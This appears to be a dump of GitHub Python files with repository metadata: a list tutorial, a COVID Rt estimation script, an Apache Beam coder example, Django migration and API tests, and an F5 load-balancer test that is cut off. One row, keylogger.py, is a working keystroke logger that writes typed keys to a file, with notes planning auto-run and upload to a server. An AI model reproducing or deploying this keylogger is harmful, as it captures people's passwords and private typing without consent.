{}']/following::input[1][@class='mapping-affl-field input' and @type='text']", "art_ap_input_affl_empty": "(//label/span[text()='Acc Record Type: ']/following::input[1][@class='mapping-acc-rec-type input' and @type='text'])[1]", "paf_pap_input_affl_empty": "(//label/span[text()='Primary Affl Field: ']/following::input[1][@class='mapping-affl-field input' and @type='text'])[1]", } }
0
0
0
6f6d746b9a3ce48ddba1228adbb0c0e61ec61582
876
py
Python
keylogger.py
SailikhithGunda/Keylogger
007e57a15cdcf07303a7082c2cdbe3e043ccc481
[ "MIT" ]
null
null
null
keylogger.py
SailikhithGunda/Keylogger
007e57a15cdcf07303a7082c2cdbe3e043ccc481
[ "MIT" ]
null
null
null
keylogger.py
SailikhithGunda/Keylogger
007e57a15cdcf07303a7082c2cdbe3e043ccc481
[ "MIT" ]
null
null
null
''' Things to do: An exe / chrome extension automatically run the script Automatically export the text file to a server/client. ''' from pynput.keyboard import Key, Listener count = 0 keys = [] with Listener(on_press = on_press, on_release = on_release) as listener: listener.join()
19.909091
73
0.509132
''' Things to do: An exe / chrome extension automatically run the script Automatically export the text file to a server/client. ''' from pynput.keyboard import Key, Listener count = 0 keys = [] def on_press(key): global keys, count keys.append(key) count += 1 if count > 10: count = 0 write_file(keys) keys = [] def write_file(keys): with open("log.txt", "a") as f: for key in keys: k = str(key).replace("'", "") if k.find("space") > 0: f.write(' ') elif k.find("Key") == -1: f.write(k) # f.write(str(key)) def on_release(key): if key==Key.esc: return False with Listener(on_press = on_press, on_release = on_release) as listener: listener.join()
477
0
74
1981ec4ebe0a96c972dacd81ff0a61b27a12c7ff
1,707
py
Python
Lists.py
tourloukisg/Python_Tutorial
a5a05e38aa88a0d3878fd6530f9952002755e0ae
[ "MIT" ]
null
null
null
Lists.py
tourloukisg/Python_Tutorial
a5a05e38aa88a0d3878fd6530f9952002755e0ae
[ "MIT" ]
null
null
null
Lists.py
tourloukisg/Python_Tutorial
a5a05e38aa88a0d3878fd6530f9952002755e0ae
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Sat Mar 6 21:10:57 2021 @author: geoto """ #clear list item=mylist3.clear() print(item) print('-----------------------------------------------') #reverse list print(mylist) list_rev=mylist.reverse()#reverse() used inplace=True so the change takes immediate effect on mylist print(mylist) listaa=[19,5,34,74,2,43] print(listaa) xxx=listaa.sort() #sort() used inplace=True so the change takes immediate effect on the listaa #sort list print(listaa) #to avoid that we can use the sorted() method as inplace=false in this case a_list=[1,5,9,3,8,4] print(sorted(a_list)) print(a_list) # create list with zeros zero_list=[0]*3 print(zero_list) # adding lists f_list=[1,2,3,4,5] s_list=[6,7,8,9,10] n_list=f_list+s_list print(n_list) # new list part of original list o_list=[1,2,3,4,5,6,7,8,9,10] n_list=o_list[3:7] #returns 4,5,6,7 (indices,3,4,5,6) print(n_list) lstrev=o_list[::-1]#returns list elements in reverse order lst2=o_list[::2]# returns list elements of step 2 print(lstrev) print(lst2) # if list b = list a, then changes will be applied to both lists list_a=[1,2,3,4,5] list_b=list_a list_b.insert(0,0) print(list_a) print(list_b) print('\r') #with copy list_a=[1,2,3,4,5] list_b=list_a.copy() list_b.insert(0,0) print(list_a) print(list_b) #with list list_a=[1,2,3,4,5] list_b=list(list_a) list_b.insert(0,0) print(list_a) print(list_b) # with slices #with copy list_a=[1,2,3,4,5] list_b=list_a[:] list_b.insert(0,0) print(list_a) print(list_b) # calculation within lists first_list=[1,2,3,4,5] second_list=[x*x*x for x in first_list] print(second_list)
19.848837
101
0.663152
# -*- coding: utf-8 -*- """ Created on Sat Mar 6 21:10:57 2021 @author: geoto """ #clear list item=mylist3.clear() print(item) print('-----------------------------------------------') #reverse list print(mylist) list_rev=mylist.reverse()#reverse() used inplace=True so the change takes immediate effect on mylist print(mylist) listaa=[19,5,34,74,2,43] print(listaa) xxx=listaa.sort() #sort() used inplace=True so the change takes immediate effect on the listaa #sort list print(listaa) #to avoid that we can use the sorted() method as inplace=false in this case a_list=[1,5,9,3,8,4] print(sorted(a_list)) print(a_list) # create list with zeros zero_list=[0]*3 print(zero_list) # adding lists f_list=[1,2,3,4,5] s_list=[6,7,8,9,10] n_list=f_list+s_list print(n_list) # new list part of original list o_list=[1,2,3,4,5,6,7,8,9,10] n_list=o_list[3:7] #returns 4,5,6,7 (indices,3,4,5,6) print(n_list) lstrev=o_list[::-1]#returns list elements in reverse order lst2=o_list[::2]# returns list elements of step 2 print(lstrev) print(lst2) # if list b = list a, then changes will be applied to both lists list_a=[1,2,3,4,5] list_b=list_a list_b.insert(0,0) print(list_a) print(list_b) print('\r') #with copy list_a=[1,2,3,4,5] list_b=list_a.copy() list_b.insert(0,0) print(list_a) print(list_b) #with list list_a=[1,2,3,4,5] list_b=list(list_a) list_b.insert(0,0) print(list_a) print(list_b) # with slices #with copy list_a=[1,2,3,4,5] list_b=list_a[:] list_b.insert(0,0) print(list_a) print(list_b) # calculation within lists first_list=[1,2,3,4,5] second_list=[x*x*x for x in first_list] print(second_list)
0
0
0
1cad44a594c7e9036bfadb91940e424ec03efd2b
5,209
py
Python
bihar/bihar_backtest.py
COVID-IWG/epimargin-studies
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
[ "MIT" ]
null
null
null
bihar/bihar_backtest.py
COVID-IWG/epimargin-studies
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
[ "MIT" ]
null
null
null
bihar/bihar_backtest.py
COVID-IWG/epimargin-studies
7d4a78e2e6713c6a0aea2cd2440529153e9a635d
[ "MIT" ]
null
null
null
from pathlib import Path from typing import Dict, Optional, Sequence, Tuple from warnings import simplefilter import matplotlib.pyplot as plt import numpy as np import pandas as pd from statsmodels.regression.linear_model import OLS from statsmodels.tools import add_constant from tqdm import tqdm import etl from epimargin.estimators import analytical_MPVS from epimargin.etl.commons import download_data from epimargin.etl.covid19india import data_path, get_time_series, load_all_data from epimargin.model import Model, ModelUnit from epimargin.plots import PlotDevice, plot_RR_est, plot_T_anomalies from epimargin.smoothing import convolution from epimargin.utils import cwd, days simplefilter("ignore") root = cwd() data = root/"data" figs = root/"figs" gamma = 0.2 smoothing = 12 CI = 0.95 # private data state_cases = pd.read_csv(data/"Bihar_cases_data_Jul23.csv", parse_dates=["date_reported"], dayfirst=True) state_ts = state_cases["date_reported"].value_counts().sort_index() district_names, population_counts, _ = etl.district_migration_matrix(data/"Migration Matrix - District.csv") populations = dict(zip(district_names, population_counts)) # first, look at state level predictions ( dates, RR_pred, RR_CI_upper, RR_CI_lower, T_pred, T_CI_upper, T_CI_lower, total_cases, new_cases_ts, anomalies, anomaly_dates ) = analytical_MPVS(state_ts, CI = CI, smoothing = convolution(window = smoothing)) plot_RR_est(dates, RR_pred, RR_CI_upper, RR_CI_lower, CI, ymin=0, ymax=4)\ .title("Bihar: Reproductive Number Estimate Comparisons")\ .xlabel("Date")\ .ylabel("Rt", rotation=0, labelpad=20) plt.ylim(0, 4) # public data paths = { "v3": [data_path(_) for _ in (1, 2)], "v4": [data_path(_) for _ in range(3, 13)] } for target in paths['v3'] + paths['v4']: download_data(data, target) dfn = load_all_data( v3_paths = [data/filepath for filepath in paths['v3']], v4_paths = [data/filepath for filepath in paths['v4']] ) state_ts = get_time_series(dfn, "detected_state").loc["Bihar"] district_names, population_counts, _ = etl.district_migration_matrix(data/"Migration Matrix - District.csv") populations = dict(zip(district_names, population_counts)) # first, look at state level predictions (dates_public, RR_pred_public, RR_CI_upper_public, RR_CI_lower_public, T_pred_public, T_CI_upper_public, T_CI_lower_public, total_cases_public, new_cases_ts_public, anomalies_public, anomaly_dates_public) = analytical_MPVS(state_ts.Hospitalized, CI = CI, smoothing = convolution(window = smoothing)) plt.plot(dates_public, RR_pred_public, label = "Estimated $R_t$", color = "midnightblue") plt.fill_between(dates_public, RR_CI_lower_public, RR_CI_upper_public, label = f"{100*CI}% CI", color = "midnightblue", alpha = 0.3) plt.legend(["private data estimate", "public data estimate"]) plt.show() np.random.seed(33) Bihar = Model([ModelUnit("Bihar", 99_000_000, I0 = T_pred[-1], RR0 = RR_pred[-1], mobility = 0)]) Bihar.run(14, np.zeros((1,1))) t_pred = [dates[-1] + pd.Timedelta(days = i) for i in range(len(Bihar[0].delta_T))] Bihar[0].lower_CI[0] = T_CI_lower[-1] Bihar[0].upper_CI[0] = T_CI_upper[-1] plot_T_anomalies(dates, T_pred, T_CI_upper, T_CI_lower, new_cases_ts, anomaly_dates, anomalies, CI) plt.scatter(t_pred, Bihar[0].delta_T, color = "tomato", s = 4, label = "Predicted Net Cases") plt.fill_between(t_pred, Bihar[0].lower_CI, Bihar[0].upper_CI, color = "tomato", alpha = 0.3, label="99% CI (forecast)") PlotDevice().title("Bihar Net Daily Cases: Private Data Projection vs. Public Reported Data").xlabel("Date").ylabel("Cases") plt.plot(dates_public, new_cases_ts_public, "k-", alpha = 0.6, label="Empirical Public Data") plt.legend() plt.semilogy() plt.ylim(0, 2000) plt.show() # # now, do district-level estimation # smoothing = 10 # district_time_series = state_cases.groupby(["geo_reported", "date_reported"])["date_reported"].count().sort_index() # migration = np.zeros((len(district_names), len(district_names))) # estimates = [] # max_len = 1 + max(map(len, district_names)) # with tqdm([etl.replacements.get(dn, dn) for dn in district_names]) as districts: # for district in districts: # districts.set_description(f"{district :<{max_len}}") # try: # (dates, RR_pred, RR_CI_upper, RR_CI_lower, *_) = analytical_MPVS(district_time_series.loc[district], CI = CI, smoothing = convolution(window = smoothing)) # estimates.append((district, RR_pred[-1], RR_CI_lower[-1], RR_CI_upper[-1], project(dates, RR_pred, smoothing))) # except (IndexError, ValueError): # estimates.append((district, np.nan, np.nan, np.nan, np.nan)) # estimates = pd.DataFrame(estimates) # estimates.columns = ["district", "Rt", "Rt_CI_lower", "Rt_CI_upper", "Rt_proj"] # estimates.set_index("district", inplace=True) # estimates.to_csv(data/"Rt_estimates.csv") # print(estimates)
42.349593
300
0.730275
from pathlib import Path from typing import Dict, Optional, Sequence, Tuple from warnings import simplefilter import matplotlib.pyplot as plt import numpy as np import pandas as pd from statsmodels.regression.linear_model import OLS from statsmodels.tools import add_constant from tqdm import tqdm import etl from epimargin.estimators import analytical_MPVS from epimargin.etl.commons import download_data from epimargin.etl.covid19india import data_path, get_time_series, load_all_data from epimargin.model import Model, ModelUnit from epimargin.plots import PlotDevice, plot_RR_est, plot_T_anomalies from epimargin.smoothing import convolution from epimargin.utils import cwd, days simplefilter("ignore") def project(dates, R_values, smoothing, period = 7*days): julian_dates = [_.to_julian_date() for _ in dates[-smoothing//2:None]] return OLS( RR_pred[-smoothing//2:None], add_constant(julian_dates) )\ .fit()\ .predict([1, julian_dates[-1] + period])[0] root = cwd() data = root/"data" figs = root/"figs" gamma = 0.2 smoothing = 12 CI = 0.95 # private data state_cases = pd.read_csv(data/"Bihar_cases_data_Jul23.csv", parse_dates=["date_reported"], dayfirst=True) state_ts = state_cases["date_reported"].value_counts().sort_index() district_names, population_counts, _ = etl.district_migration_matrix(data/"Migration Matrix - District.csv") populations = dict(zip(district_names, population_counts)) # first, look at state level predictions ( dates, RR_pred, RR_CI_upper, RR_CI_lower, T_pred, T_CI_upper, T_CI_lower, total_cases, new_cases_ts, anomalies, anomaly_dates ) = analytical_MPVS(state_ts, CI = CI, smoothing = convolution(window = smoothing)) plot_RR_est(dates, RR_pred, RR_CI_upper, RR_CI_lower, CI, ymin=0, ymax=4)\ .title("Bihar: Reproductive Number Estimate Comparisons")\ .xlabel("Date")\ .ylabel("Rt", rotation=0, labelpad=20) plt.ylim(0, 4) # public data paths = { "v3": [data_path(_) for _ in (1, 2)], "v4": [data_path(_) for _ in range(3, 13)] } for target in paths['v3'] + paths['v4']: download_data(data, target) dfn = load_all_data( v3_paths = [data/filepath for filepath in paths['v3']], v4_paths = [data/filepath for filepath in paths['v4']] ) state_ts = get_time_series(dfn, "detected_state").loc["Bihar"] district_names, population_counts, _ = etl.district_migration_matrix(data/"Migration Matrix - District.csv") populations = dict(zip(district_names, population_counts)) # first, look at state level predictions (dates_public, RR_pred_public, RR_CI_upper_public, RR_CI_lower_public, T_pred_public, T_CI_upper_public, T_CI_lower_public, total_cases_public, new_cases_ts_public, anomalies_public, anomaly_dates_public) = analytical_MPVS(state_ts.Hospitalized, CI = CI, smoothing = convolution(window = smoothing)) plt.plot(dates_public, RR_pred_public, label = "Estimated $R_t$", color = "midnightblue") plt.fill_between(dates_public, RR_CI_lower_public, RR_CI_upper_public, label = f"{100*CI}% CI", color = "midnightblue", alpha = 0.3) plt.legend(["private data estimate", "public data estimate"]) plt.show() np.random.seed(33) Bihar = Model([ModelUnit("Bihar", 99_000_000, I0 = T_pred[-1], RR0 = RR_pred[-1], mobility = 0)]) Bihar.run(14, np.zeros((1,1))) t_pred = [dates[-1] + pd.Timedelta(days = i) for i in range(len(Bihar[0].delta_T))] Bihar[0].lower_CI[0] = T_CI_lower[-1] Bihar[0].upper_CI[0] = T_CI_upper[-1] plot_T_anomalies(dates, T_pred, T_CI_upper, T_CI_lower, new_cases_ts, anomaly_dates, anomalies, CI) plt.scatter(t_pred, Bihar[0].delta_T, color = "tomato", s = 4, label = "Predicted Net Cases") plt.fill_between(t_pred, Bihar[0].lower_CI, Bihar[0].upper_CI, color = "tomato", alpha = 0.3, label="99% CI (forecast)") PlotDevice().title("Bihar Net Daily Cases: Private Data Projection vs. Public Reported Data").xlabel("Date").ylabel("Cases") plt.plot(dates_public, new_cases_ts_public, "k-", alpha = 0.6, label="Empirical Public Data") plt.legend() plt.semilogy() plt.ylim(0, 2000) plt.show() # # now, do district-level estimation # smoothing = 10 # district_time_series = state_cases.groupby(["geo_reported", "date_reported"])["date_reported"].count().sort_index() # migration = np.zeros((len(district_names), len(district_names))) # estimates = [] # max_len = 1 + max(map(len, district_names)) # with tqdm([etl.replacements.get(dn, dn) for dn in district_names]) as districts: # for district in districts: # districts.set_description(f"{district :<{max_len}}") # try: # (dates, RR_pred, RR_CI_upper, RR_CI_lower, *_) = analytical_MPVS(district_time_series.loc[district], CI = CI, smoothing = convolution(window = smoothing)) # estimates.append((district, RR_pred[-1], RR_CI_lower[-1], RR_CI_upper[-1], project(dates, RR_pred, smoothing))) # except (IndexError, ValueError): # estimates.append((district, np.nan, np.nan, np.nan, np.nan)) # estimates = pd.DataFrame(estimates) # estimates.columns = ["district", "Rt", "Rt_CI_lower", "Rt_CI_upper", "Rt_proj"] # estimates.set_index("district", inplace=True) # estimates.to_csv(data/"Rt_estimates.csv") # print(estimates)
267
0
23
bc77493303e5ad9f2e8d68e8426387e82ce4266d
1,136
py
Python
tests/get_test_name_and_number.py
steverpalmer/GenericTesting
89dd9a7bf6bed74b009a0cdeaeef445993608162
[ "BSD-3-Clause" ]
null
null
null
tests/get_test_name_and_number.py
steverpalmer/GenericTesting
89dd9a7bf6bed74b009a0cdeaeef445993608162
[ "BSD-3-Clause" ]
null
null
null
tests/get_test_name_and_number.py
steverpalmer/GenericTesting
89dd9a7bf6bed74b009a0cdeaeef445993608162
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/env python3 # Copyright 2021 Steve Palmer """Generate a complete list of test numbers and names.""" import collections import inspect import generic_testing TestRecord = collections.namedtuple("TestRecord", ["class_", "testname", "test_number"]) if __name__ == "__main__": Main()
32.457143
111
0.582746
#!/usr/bin/env python3 # Copyright 2021 Steve Palmer """Generate a complete list of test numbers and names.""" import collections import inspect import generic_testing TestRecord = collections.namedtuple("TestRecord", ["class_", "testname", "test_number"]) class Main: def __init__(self): alltests = [] for name, cls in inspect.getmembers(generic_testing): if name.endswith("Tests") and inspect.isclass(cls): for name2, fun in inspect.getmembers(cls): if name2.startswith("test_generic_") and inspect.isfunction(fun): try: test_num = int(name2[13:17]) except ValueError: test_num = 0 alltests.append(TestRecord(name, name2, test_num)) alltests.sort(key=lambda tr: f"{tr.test_number:04d}{tr.testname}{tr.class_}") for tr in alltests: print( f"TestRecord(test_number={tr.test_number:04d}, class_={tr.class_:30s}, testname={tr.testname})" ) if __name__ == "__main__": Main()
795
-10
49
9c0d04b816acc96817c632107ea912ad5acdddcd
4,708
py
Python
sdks/python/apache_beam/examples/cookbook/group_with_coder.py
szewi/beam
ae0de1bb5f44ab39969442932c662ecde668bce3
[ "Apache-2.0" ]
4
2020-10-09T01:46:55.000Z
2020-10-09T02:12:19.000Z
python/dataflow_examples/cookbook/group_with_coder.py
yufengzh/DataflowSDK-examples
3727e986e5835286d5bdf5bc679af5e0be090097
[ "Apache-2.0" ]
12
2019-11-13T04:59:52.000Z
2021-12-14T21:13:47.000Z
python/dataflow_examples/cookbook/group_with_coder.py
yufengzh/DataflowSDK-examples
3727e986e5835286d5bdf5bc679af5e0be090097
[ "Apache-2.0" ]
2
2017-09-23T14:41:17.000Z
2018-08-29T02:57:03.000Z
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """An example of using custom classes and coder for grouping operations. This workflow demonstrates registration and usage of a custom coder for a user- defined class. A deterministic custom coder is needed to use a class as a key in a combine or group operation. This example assumes an input file with, on each line, a comma-separated name and score. """ from __future__ import absolute_import import argparse import logging import sys import apache_beam as beam from apache_beam import coders from apache_beam.io import ReadFromText from apache_beam.io import WriteToText from apache_beam.typehints import typehints from apache_beam.typehints.decorators import with_output_types from apache_beam.options.pipeline_options import PipelineOptions from apache_beam.options.pipeline_options import SetupOptions class Player(object): """A custom class used as a key in combine/group transforms.""" class PlayerCoder(coders.Coder): """A custom coder for the Player class.""" def encode(self, o): """Encode to bytes with a trace that coder was used.""" # Our encoding prepends an 'x:' prefix. return 'x:%s' % str(o.name) # Annotate the get_players function so that the typehint system knows that the # input to the CombinePerKey operation is a key-value pair of a Player object # and an integer. @with_output_types(typehints.KV[Player, int]) def run(args=None): """Runs the workflow computing total points from a collection of matches.""" if args is None: args = sys.argv[1:] parser = argparse.ArgumentParser() parser.add_argument('--input', required=True, help='Input file to process.') parser.add_argument('--output', required=True, help='Output file to write results to.') known_args, pipeline_args = parser.parse_known_args(args) # We use the save_main_session option because one or more DoFn's in this # workflow rely on global context (e.g., a module imported at module level). pipeline_options = PipelineOptions(pipeline_args) pipeline_options.view_as(SetupOptions).save_main_session = True with beam.Pipeline(options=pipeline_options) as p: # Register the custom coder for the Player class, so that it will be used in # the computation. coders.registry.register_coder(Player, PlayerCoder) (p # pylint: disable=expression-not-assigned | ReadFromText(known_args.input) # The get_players function is annotated with a type hint above, so the type # system knows the output type of the following operation is a key-value # pair of a Player and an int. Please see the documentation for details on # types that are inferred automatically as well as other ways to specify # type hints. | beam.Map(get_players) # The output type hint of the previous step is used to infer that the key # type of the following operation is the Player type. Since a custom coder # is registered for the Player class above, a PlayerCoder will be used to # encode Player objects as keys for this combine operation. | beam.CombinePerKey(sum) | beam.Map(lambda (k, v): '%s,%d' % (k.name, v)) | WriteToText(known_args.output)) if __name__ == '__main__': logging.getLogger().setLevel(logging.INFO) run()
37.967742
80
0.731308
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """An example of using custom classes and coder for grouping operations. This workflow demonstrates registration and usage of a custom coder for a user- defined class. A deterministic custom coder is needed to use a class as a key in a combine or group operation. This example assumes an input file with, on each line, a comma-separated name and score. """ from __future__ import absolute_import import argparse import logging import sys import apache_beam as beam from apache_beam import coders from apache_beam.io import ReadFromText from apache_beam.io import WriteToText from apache_beam.typehints import typehints from apache_beam.typehints.decorators import with_output_types from apache_beam.options.pipeline_options import PipelineOptions from apache_beam.options.pipeline_options import SetupOptions class Player(object): """A custom class used as a key in combine/group transforms.""" def __init__(self, name): self.name = name class PlayerCoder(coders.Coder): """A custom coder for the Player class.""" def encode(self, o): """Encode to bytes with a trace that coder was used.""" # Our encoding prepends an 'x:' prefix. return 'x:%s' % str(o.name) def decode(self, s): # To decode, we strip off the prepended 'x:' prefix. assert s[0:2] == 'x:' return Player(s[2:]) def is_deterministic(self): # Since coded Player objects are used as keys below with # beam.CombinePerKey(sum), we require that this coder is deterministic # (i.e., two equivalent instances of the classes are encoded into the same # byte string) in order to guarantee consistent results. return True # Annotate the get_players function so that the typehint system knows that the # input to the CombinePerKey operation is a key-value pair of a Player object # and an integer. @with_output_types(typehints.KV[Player, int]) def get_players(descriptor): name, points = descriptor.split(',') return Player(name), int(points) def run(args=None): """Runs the workflow computing total points from a collection of matches.""" if args is None: args = sys.argv[1:] parser = argparse.ArgumentParser() parser.add_argument('--input', required=True, help='Input file to process.') parser.add_argument('--output', required=True, help='Output file to write results to.') known_args, pipeline_args = parser.parse_known_args(args) # We use the save_main_session option because one or more DoFn's in this # workflow rely on global context (e.g., a module imported at module level). pipeline_options = PipelineOptions(pipeline_args) pipeline_options.view_as(SetupOptions).save_main_session = True with beam.Pipeline(options=pipeline_options) as p: # Register the custom coder for the Player class, so that it will be used in # the computation. coders.registry.register_coder(Player, PlayerCoder) (p # pylint: disable=expression-not-assigned | ReadFromText(known_args.input) # The get_players function is annotated with a type hint above, so the type # system knows the output type of the following operation is a key-value # pair of a Player and an int. Please see the documentation for details on # types that are inferred automatically as well as other ways to specify # type hints. | beam.Map(get_players) # The output type hint of the previous step is used to infer that the key # type of the following operation is the Player type. Since a custom coder # is registered for the Player class above, a PlayerCoder will be used to # encode Player objects as keys for this combine operation. | beam.CombinePerKey(sum) | beam.Map(lambda (k, v): '%s,%d' % (k.name, v)) | WriteToText(known_args.output)) if __name__ == '__main__': logging.getLogger().setLevel(logging.INFO) run()
511
0
97
38cf8917ebc220ff8754786994efb4af03ae9a65
644
py
Python
forum/threads/migrations/0011_thread_followers.py
successIA/Forum
08de91a033da2c3779acbf95dfe0210eb1276a26
[ "MIT" ]
null
null
null
forum/threads/migrations/0011_thread_followers.py
successIA/Forum
08de91a033da2c3779acbf95dfe0210eb1276a26
[ "MIT" ]
6
2020-08-13T18:54:33.000Z
2021-06-10T20:20:16.000Z
forum/threads/migrations/0011_thread_followers.py
successIA/ClassicForum
08de91a033da2c3779acbf95dfe0210eb1276a26
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.11.22 on 2019-11-21 23:29 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models
28
141
0.68323
# -*- coding: utf-8 -*- # Generated by Django 1.11.22 on 2019-11-21 23:29 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('threads', '0010_auto_20191122_0020'), ] operations = [ migrations.AddField( model_name='thread', name='followers', field=models.ManyToManyField(related_name='thread_following', through='threads.ThreadFollowership', to=settings.AUTH_USER_MODEL), ), ]
0
431
23
650a8c743c76ea9bb108b7bc46a8f2beb0a59150
2,024
py
Python
buyer/tests/test_views.py
uktrade/directory-api
45a9024a7ecc2842895201cbb51420ba9e57a168
[ "MIT" ]
2
2017-06-02T09:09:08.000Z
2021-01-18T10:26:53.000Z
buyer/tests/test_views.py
uktrade/directory-api
45a9024a7ecc2842895201cbb51420ba9e57a168
[ "MIT" ]
629
2016-10-10T09:35:52.000Z
2022-03-25T15:04:04.000Z
buyer/tests/test_views.py
uktrade/directory-api
45a9024a7ecc2842895201cbb51420ba9e57a168
[ "MIT" ]
5
2017-06-22T10:02:22.000Z
2022-03-14T17:55:21.000Z
import http from unittest.mock import Mock, patch import pytest from django.conf import settings from django.test import override_settings from django.urls import reverse from rest_framework import status from buyer import models from core.tests.test_views import reload_module, reload_urlconf @pytest.mark.django_db @patch('sigauth.helpers.RequestSignatureChecker.test_signature', Mock(return_value=True)) @pytest.mark.django_db @patch('sigauth.helpers.RequestSignatureChecker.test_signature', Mock(return_value=True)) @patch('core.views.get_file_from_s3') @override_settings(STORAGE_CLASS_NAME='default') @override_settings(AWS_STORAGE_BUCKET_NAME_DATA_SCIENCE='my_db_buket')
37.481481
100
0.736166
import http from unittest.mock import Mock, patch import pytest from django.conf import settings from django.test import override_settings from django.urls import reverse from rest_framework import status from buyer import models from core.tests.test_views import reload_module, reload_urlconf @pytest.mark.django_db @patch('sigauth.helpers.RequestSignatureChecker.test_signature', Mock(return_value=True)) def test_create_buyer_deserialization(client): data = { 'email': 'jim@example.com', 'name': 'Jim Exampleson', 'sector': 'AEROSPACE', 'company_name': 'Example corp', 'country': 'China', 'comment': 'Good stuff.', } response = client.post(reverse('buyer-create'), data) instance = models.Buyer.objects.last() assert response.status_code == http.client.CREATED assert instance.email == data['email'] assert instance.name == data['name'] assert instance.sector == data['sector'] @pytest.mark.django_db @patch('sigauth.helpers.RequestSignatureChecker.test_signature', Mock(return_value=True)) @patch('core.views.get_file_from_s3') @override_settings(STORAGE_CLASS_NAME='default') @override_settings(AWS_STORAGE_BUCKET_NAME_DATA_SCIENCE='my_db_buket') def test_buyer_csv_dump(mocked_get_file_from_s3, authed_client): reload_module('company.views') reload_module('buyer.views') reload_urlconf() mocked_body = Mock() mocked_body.read.return_value = b'company_name\r\nacme\r\n' mocked_get_file_from_s3.return_value = {'Body': mocked_body} response = authed_client.get(reverse('buyer-csv-dump'), {'token': settings.CSV_DUMP_AUTH_TOKEN}) assert response.status_code == status.HTTP_200_OK assert response.content == b'company_name\r\nacme\r\n' assert response._headers['content-type'] == ('Content-Type', 'text/csv') assert response._headers['content-disposition'] == ( 'Content-Disposition', 'attachment; filename="{filename}"'.format(filename=settings.BUYERS_CSV_FILE_NAME), )
1,296
0
44
1cb01409585916ebaaa745f459bc65177a6e04ff
44,690
py
Python
src/config/svc-monitor/svc_monitor/tests/test_f5_lb.py
UbuntuEvangelist/contrail-controller
4e8a992230f8f8e91e4f753e19b5442d9e1b446d
[ "Apache-2.0" ]
null
null
null
src/config/svc-monitor/svc_monitor/tests/test_f5_lb.py
UbuntuEvangelist/contrail-controller
4e8a992230f8f8e91e4f753e19b5442d9e1b446d
[ "Apache-2.0" ]
null
null
null
src/config/svc-monitor/svc_monitor/tests/test_f5_lb.py
UbuntuEvangelist/contrail-controller
4e8a992230f8f8e91e4f753e19b5442d9e1b446d
[ "Apache-2.0" ]
18
2017-01-12T09:28:44.000Z
2019-04-18T20:47:42.000Z
import mock from mock import patch import unittest from cfgm_common.vnc_db import DBBase from svc_monitor import config_db from svc_monitor import loadbalancer_agent from vnc_api.vnc_api import * import argparse import ConfigParser # end setUp # end tearDown # end create_pool #end create_hm_obj # end create_hm # end update_pool # end update_vip # end create_pool_members # end create_pool_member # end create_project # end create_vn # end obj_to_dict # end create_vmi # end create_iip # end create_vip # end test_add_delete_pool_with_members_vip # end test_add_delete_pool_with_members_vip_hm # end test_update_pool # Test the case where vip is deleted before the pool # end test_update_pool # end test_update_pool_members_add_delete # end test_update_pool_member_props # end test_update_pool_members_add_delete # end test_update_vip # end test_update_vip # end test_update_vip_persistance_type # end test_add_delete_pool_with_members_vip_hm # end test_add_delete_multiple_pools #end F5LBTest(unittest.TestCase):
47.643923
318
0.637055
import mock from mock import patch import unittest from cfgm_common.vnc_db import DBBase from svc_monitor import config_db from svc_monitor import loadbalancer_agent from vnc_api.vnc_api import * import argparse import ConfigParser class F5LBTest(unittest.TestCase): def setUp(self): self.vnc_lib = mock.Mock() self.cassandra = mock.Mock() self.logger = mock.Mock() self.svc = mock.Mock() mocked_gsc = mock.MagicMock() mocked_gsc.uuid = 'fake-gsc-uuid' self.vnc_lib.global_system_config_read.return_value = mocked_gsc def mock_kv_retrieve(subnet_id): if subnet_id == "pool_subnet_id": return "fake-pool-vn 40.1.1.0/24" elif subnet_id == "vip_subnet_id": return "fake-vip-vn 1.1.1.0/24" self.assertTrue(False) #end self.vnc_lib.kv_retrieve = mock.Mock(side_effect=mock_kv_retrieve) self.vnc_lib.service_appliance_set_create.return_value = "opencontrail" self._mock_bigip_interfaces = None self._mock_BigIp = None self._db = {} def read_db(id): if id in self._db: return self._db[id].get('driver_info', None) def put_db(id, data): from copy import deepcopy self._db[id] = {'driver_info': deepcopy(data)} def remove_db(id, data=None): if data is None: del self._db[id] return if self._db[id][data[0]]: del self._db[id][data[0]] self.cassandra.pool_driver_info_get = mock.Mock(side_effect=read_db) self.cassandra.pool_driver_info_insert = mock.Mock(side_effect=put_db) self.cassandra.pool_remove = mock.Mock(side_effect=remove_db) conf_parser = argparse.ArgumentParser(add_help=False) config = ConfigParser.SafeConfigParser({'admin_token': None}) self._args, remaining_argv = conf_parser.parse_known_args() self._args.config_sections = config def sas_read_side_effect(obj_type, uuids): if obj_type == 'service_appliance_set': return (True, [{ 'fq_name': ['default-global-system-config', 'opencontrail'], 'service_appliance_driver': 'svc_monitor.services.loadbalancer\ .drivers.ha_proxy.driver.OpencontrailLoadbalancerDriver' }]) return (False, None) DBBase.init(self.svc, None, self.cassandra) config_db.ServiceApplianceSetSM._cassandra.object_read = \ mock.Mock(side_effect=sas_read_side_effect) # return NoIdError exception for first query def no_id_side_effect(fq_name): raise NoIdError("xxx") self.vnc_lib.service_appliance_set_read = \ mock.Mock(side_effect=no_id_side_effect) self.lb_agent = 